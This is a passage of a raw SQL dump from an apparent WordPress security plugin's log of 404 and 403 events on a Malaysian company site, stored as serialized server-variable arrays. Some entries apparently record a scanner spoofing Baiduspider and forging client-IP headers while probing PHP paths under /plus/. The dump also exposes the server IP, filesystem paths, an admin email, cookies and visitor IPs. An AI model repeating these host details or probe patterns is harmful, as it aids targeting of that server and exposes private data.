+http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:11:\"20.39.74.98\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/plus/laobiao.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:17:\"/plus/laobiao.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6YR6yUrY9zjNB4MheucAAAAYM\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/plus/laobiao.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:17:\"/plus/laobiao.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6YR6yUrY9zjNB4MheucAAAAYM\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/plus/laobiao.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/plus/laobiao.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6YR6yUrY9zjNB4MheucAAAAYM\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"62007\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"https://bintara.com.my/plus/laobiao.php\";s:10:\"SCRIPT_URL\";s:17:\"/plus/laobiao.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6YR6yUrY9zjNB4MheucAAAAYM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570674759.497\";s:12:\"REQUEST_TIME\";s:10:\"1570674759\";}}','notice','2019-10-10 02:32:41','2019-10-10 02:32:39',35055984,36862952,'https://bintara.com.my/plus/laobiao.php',1,0,'20.39.74.98'),(27828,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:59:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/plus/e7xue.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:15:\"168.105.217.173\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=1d9613f128ea90a61bbb31ac1481427c\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"168.105.217.173\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/e7xue.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/e7xue.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6YPKyUrY9zjNB4MheuYwAAAYg\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/e7xue.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/e7xue.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6YPKyUrY9zjNB4MheuYwAAAYg\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/e7xue.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/plus/e7xue.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6YPKyUrY9zjNB4MheuYwAAAYg\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"61576\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/e7xue.php\";s:10:\"SCRIPT_URL\";s:15:\"/plus/e7xue.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6YPKyUrY9zjNB4MheuYwAAAYg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674748.9905\";s:12:\"REQUEST_TIME\";s:10:\"1570674748\";}}','notice','2019-10-10 02:32:30','2019-10-10 02:32:29',35057448,36871120,'https://bintara.com.my/plus/e7xue.php',1,0,'168.105.217.173'),(27827,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:59:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/plus/digg.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:13:\"156.99.100.37\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=01323110380f8b87dcd0fbc1549ce3dc\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"156.99.100.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/plus/digg.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:14:\"/plus/digg.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6YMuBT1onqG4TOWhlF0gAAAQ8\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/plus/digg.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:14:\"/plus/digg.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6YMuBT1onqG4TOWhlF0gAAAQ8\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/plus/digg.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/plus/digg.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6YMuBT1onqG4TOWhlF0gAAAQ8\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"61155\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/plus/digg.php\";s:10:\"SCRIPT_URL\";s:14:\"/plus/digg.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6YMuBT1onqG4TOWhlF0gAAAQ8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674738.6914\";s:12:\"REQUEST_TIME\";s:10:\"1570674738\";}}','notice','2019-10-10 02:32:20','2019-10-10 02:32:19',35054632,36860936,'https://bintara.com.my/plus/digg.php',1,0,'156.99.100.37'),(27579,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:9:\"/ptz-pro/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/ptz-pro/\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/ptz-pro/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZnKGzkjoKiPfp7KV-0cNgAAAQU\";s:12:\"REDIRECT_URL\";s:9:\"/ptz-pro/\";s:11:\"REMOTE_ADDR\";s:13:\"207.46.13.191\";s:11:\"REMOTE_PORT\";s:5:\"10806\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/ptz-pro/\";s:10:\"SCRIPT_URL\";s:9:\"/ptz-pro/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZnKGzkjoKiPfp7KV-0cNgAAAQU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570359835.3785\";s:12:\"REQUEST_TIME\";s:10:\"1570359835\";}}','notice','2019-10-06 11:03:58','2019-10-06 11:03:55',34357752,36164624,'https://bintara.com.my/ptz-pro/',1,0,'207.46.13.191'),(27578,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:31:\"/?page_id=18/rss/news/index.xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3452.0 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:29:\"page_id=18/rss/news/index.xml\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"110.74.222.102\";s:11:\"REMOTE_PORT\";s:5:\"42150\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZm3XYUY8eGcCNBrto2FVAAAAQ4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570355037.9263\";s:12:\"REQUEST_TIME\";s:10:\"1570355037\";}}','notice','2019-10-06 09:43:59','2019-10-06 09:43:58',35029464,36827464,'https://bintara.com.my/?page_id=18/rss/news/index.xml',1,0,'110.74.222.102'),(27577,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:52:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/licensed.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:35:\"https://bintara.com.my/licensed.php\";s:15:\"HTTP_USER_AGENT\";s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/licensed.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/licensed.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZmpWd0BvPwKdS9ZvhVOzQAAAIM\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/licensed.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/licensed.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZmpWd0BvPwKdS9ZvhVOzQAAAIM\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"93.79.221.112\";s:11:\"REMOTE_PORT\";s:5:\"43057\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/licensed.php\";s:10:\"SCRIPT_URL\";s:13:\"/licensed.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZmpWd0BvPwKdS9ZvhVOzQAAAIM\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570351450.008\";s:12:\"REQUEST_TIME\";s:10:\"1570351450\";}}','notice','2019-10-06 08:44:11','2019-10-06 08:44:10',35039288,36843832,'https://bintara.com.my/licensed.php',1,0,'93.79.221.112'),(27576,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"108.161.133.55\";s:11:\"REMOTE_PORT\";s:5:\"57949\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZmVaHe8CK6y8PnE8iNdYwAAAMo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570346344.5634\";s:12:\"REQUEST_TIME\";s:10:\"1570346344\";}}','notice','2019-10-06 07:19:06','2019-10-06 07:19:05',35021688,36836000,'https://bintara.com.my/?page_id=18',1,0,'108.161.133.55'),(27575,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:35:\"/mailbox-migration-exchange-online/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:57:\"https://bintara.com.my/mailbox-migration-exchange-online/\";s:19:\"REDIRECT_SCRIPT_URL\";s:35:\"/mailbox-migration-exchange-online/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZmUgne8CK6y8PnE8iNbkgAAAMU\";s:12:\"REDIRECT_URL\";s:35:\"/mailbox-migration-exchange-online/\";s:11:\"REMOTE_ADDR\";s:11:\"13.66.139.0\";s:11:\"REMOTE_PORT\";s:5:\"45120\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:57:\"https://bintara.com.my/mailbox-migration-exchange-online/\";s:10:\"SCRIPT_URL\";s:35:\"/mailbox-migration-exchange-online/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZmUgne8CK6y8PnE8iNbkgAAAMU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570346114.6813\";s:12:\"REQUEST_TIME\";s:10:\"1570346114\";}}','notice','2019-10-06 